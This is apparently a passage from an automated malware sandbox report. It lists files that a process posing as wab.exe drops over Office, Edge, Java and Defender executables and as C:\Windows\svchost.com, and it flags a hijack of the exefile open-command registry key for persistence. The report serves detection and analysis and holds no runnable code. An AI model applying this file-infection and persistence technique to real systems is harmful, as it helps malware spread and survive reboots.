              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Windows\svchost.comJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Temp\chrome.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Windows\svchost.comJump to dropped file

              Boot Survival

              barindex
              Creates an undocumented autostart registry key
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULLJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULLJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
